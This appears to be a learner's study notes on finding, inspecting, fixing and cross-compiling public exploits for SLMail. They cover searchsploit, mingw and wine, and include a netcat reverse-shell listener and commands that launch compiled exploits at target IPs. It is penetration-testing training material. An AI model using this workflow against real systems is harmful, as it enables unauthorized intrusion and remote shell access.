Free MP3 Music Header Free MP3 Music Header Free MP3 Music Header
Chrome Strip
Chrome Strip
USING PUBLIC EXPLOITS

==============================================================
USING PUBLIC EXPLOITS - Overview
==============================================================

We are now ready to use other people's exploit code that we find online from untrusted sources. Quite often we will find fake exploits that will attack the user running them.

Code/Exploits should always be inspected eg:
#more fake-ssh-exploit.c

If there is any shell code, save the shellcode in to a txt file so it can be translated.

Print shellcode to reading characters so that it becomes human readable:

#printf $(cat filename.txt |tr -d '\n')
The example in the video is a nasty one. It deletes all files recursively and then goes online to alert the world what you have done.

USING PUBLIC EXPLOITS - Finding Public Exploits

Where can we find exploits that we can run safely? Fortunately there are several reliable sources for exploit code:

exploit db - maintained by offensive security
- occassionally includes an exploit for a known vulnerability
- www.exploit-db.com

security focused vulnerability archives
- maintained by symantec
- often includes an exploit for a known vulnerability.
- www.securityfocus.com/vulnerabilities

www.securityfocus.com/vulnerabilities
This site lists the latest vulnerabilities that have been found and reported, by date.

By clicking on a listed vulnerability, the site provides more information about affected systems a CVE number etc. At times a working PoC may also be found which can be used to demonstrate the bug.

USING PUBLIC EXPLOITS - Exploit DB
www.exploit-db.com

exploits are searchable, added daily and categorised by type. The archive is also available for offline download and is present in Kali Linux in the /usr/share/exploitdb directory.
# ls -l /usr/share/exploitdb/

Kali contains a useful script which will help search for various exploits in this archive. This script is scalled searchsploit.

*********************
In order to find exploits with SLMail in the title:
#searchsploit slmail

search for exact text in exploit title.
#searchsploit -e internet explorer 11

To update the exploitdb definitions:
#searchsploit -u

As always, help:
#searchsploit -h
*********************

Due to various versions, patches etc, most exploits available publicly will not work as is. They are likely to need some debugging and fixing in order to get the expected results. Some exploits will be oneshot deals. If it does not work as expected, the service will crash and no longer be available for further exploitation attempts until either the service or the machine is restarted. For this reason, we will never run an exploit without first examing it's source code and understanding it's inner workings.

We should always strive to setup a small development environment that matches the OS version and vulnerable software in order to test and adjust and existing exploits to match our environment. Once we are pretty sure the exploit will work, we can proceed to use it on the target victim machine.

Exploits can be written in any manner of languages. Some languages such as C differ for Windows and Linux to further complicate matters.

Copy multiple files at once:
#cp /usr/share/exploitdb/platforms/windows/remote/{643.c,646.c}

USING PUBLIC EXPLOITS - Fixing Public Exploits 1
The libraries at the top of the code sample will indicate what environment and what type of compiler should be used to compile the exploit.

/platforms/windows/remote/643.c should be compiled in a Unix-like environment (linux?) with a compiler such as GCC.

#include
#include
#include
#include
#include
#include
#include
#include
#include

Next we see that the return address is very likely irrelevant to our target. We then see a hardcoded reverse shell shellcode that will most likely not match our environment, so we will also need to swap out the shellcode. In addition some buffer offsets seem slightly misaligned and some other modifications need to be made before we can get this exploit to a working condition.

Once the exploit has been updated, we need to compile it to a linux elf binary. In this case the modified exploit is called 634-fixed.c and the binary output will be slmail-linux

#gcc 643-fixed.c -o slmail-linux

To confirm that the file compiled and is now an ELF binary file:
# file slmail-linux

Launch SLMail

Setup a listener
#nc -lvnp 443

run the exploit with wine and define a target ip.
#./slmail-linux

If the exploit does not work for you, use tools such as immunity debugger and wireshark and fix it.

USING PUBLIC EXPLOITS - Fixing Public Exploits 2
When we look at the second exploit:
/platforms/windows/remote/646.c

We notice some different looking libraries included. These libraries indicate that the code should be compiled in a windows environment.

#include
#include
#include
#include

Again, the embedded shellcode and the return address for the target will need to be replaced. Once the code has been modified and updated we now need to compile this windows code in linux. To our resuce comes mingw.

Mingw is a windows cross compiler that is available in Kali Linux. If not already installed we can quickly install Mingw with the following command:

#apt-get install mingw32

USING PUBLIC EXPLOITS - Cross Compiling Windows Exploit Code
We will use mingw cross compiler to compile our SLMail windows orientated exploit code into a windows PE executable.

Trying to run mingw to compile 646-fixed.c
#i586-mingw32msvc-gcc 646-fixed.c
Should be:
#i686-w64-mingw32-gcc 646-fixed.c

In this example, this results in a compilation error. The next step is to google some of the compilation errors.

After reviewing forums, a fix is identified. A library needed to be defined on the CLI at compilation time along with an output file name.
#i586-mingw32msvc-gcc 646-fixed.c -lws2_32 -o slmail-windows.exe

Check that the filed compiled and is a windows executable:
#file slmail-windows.exe

I can now run this windows PE file on linux using wine which is also in Kali. Wine is the windows implementation on unix. In order to run the file:
#wine slmail-windows.exe
eg:
#wine slmail-windows.exe 10.11.25.39

Launch SLMail

Setup a listener
#nc -lvnp 443

run the exploit with wine and define a target ip.
#wine slmail-windows.exe 192.168.30.35

If the exploit does not work for you, use tools such as immunity debugger and wireshark and fix it.

Note that we have compiled windows code on a linux machine and then run an windows executable on linux this is a useful thing to remember as we will often be able to compile and run imple windows applications on kali and avoid having to change Operating Systems.

***
I managed to get this one to work. I made 12 changes. This required, replace the shell code, replace the retadd, and then adjust where the ptr is pointing. This is documented in some details in Keepnote.
***